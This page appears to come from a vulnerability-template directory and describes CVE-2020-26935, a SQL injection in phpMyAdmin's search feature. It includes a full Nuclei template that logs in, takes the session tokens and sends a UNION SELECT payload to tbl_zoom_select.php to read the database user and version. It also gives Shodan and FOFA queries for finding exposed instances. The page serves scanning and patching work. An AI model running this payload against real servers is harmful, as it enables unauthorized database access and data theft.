phpMyAdmin < 5.0.3 - SQL Injection
CVE-2020-26935
Verified
Description
phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection vulnerability caused by improper processing of SQL statements in the search feature, which lets attackers inject malicious SQL. Exploitation requires crafted search input.
Severity
Critical
CVSS Score
9.8
Exploit Probability
67%
Published Date
January 21, 2026
Template Author
0x_akoko
CVE-2020-26935.yaml
id: CVE-2020-26935
info:
  name: phpMyAdmin < 5.0.3 - SQL Injection
  author: 0x_Akoko
  severity: critical
  description: |
    phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection caused by improper processing of SQL statements in the search feature, letting attackers inject malicious SQL, exploit requires crafted search input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to phpMyAdmin 4.9.6 or 5.0.3, or latest version.
  reference:
    - https://www.phpmyadmin.net/security/PMASA-2020-6/
    - https://github.com/phpmyadmin/phpmyadmin/commit/d09ab9bc9d634ad08b866d42bb8c4109869d38d2
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26935
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-26935
    epss-score: 0.66545
    epss-percentile: 0.99188
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 4
    shodan-query: http.title:"phpMyAdmin"
    fofa-query: app="phpMyAdmin"
  tags: cve,cve2020,phpmyadmin,sqli,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "phpMyAdmin", "name=\"token\"")
        condition: and
        internal: true
    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - 'name="token" value="([^"]+)"'
        internal: true
      - type: regex
        name: set_session
        part: body
        group: 1
        regex:
          - 'name="set_session" value="([^"]+)"'
        internal: true
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pma_username={{username}}&pma_password={{password}}&server=1&target=index.php&token={{token}}&set_session={{set_session}}
    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "pmaAuth-1=")
        condition: and
        internal: true
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "logged_in:true")
        condition: and
        internal: true
    extractors:
      - type: regex
        name: token2
        part: body
        group: 1
        regex:
          - 'token:"([^"]+)"'
        internal: true
  - raw:
      - |
        POST /tbl_zoom_select.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        db=testdb&table=users&where_clause=1=0 UNION SELECT 1,CONCAT(USER(),0x3a,DATABASE(),0x3a,VERSION()),3-- -&where_clause_sign=&token={{token2}}&ajax_request=true&get_data_row=true
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "\"success\":true", "\"row_info\"")
        condition: and
    extractors:
      - type: regex
        name: sqli_data
        part: body
        group: 1
        regex:
          - '"username":"([^"]+)"'
# digest: 4b0a00483046022100a58810d2b29662a35138f360d58414e732ebf73e504e92fc6e2b5d9244af4a86022100f31c97a9364ba0dcdadc7dcf189f2a7fe65d5fa6514f5cf73525a264a60830ab:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2020-26935
CWE ID:
cwe-89
Remediation Steps
Update to phpMyAdmin 4.9.6 or 5.0.3, or latest version.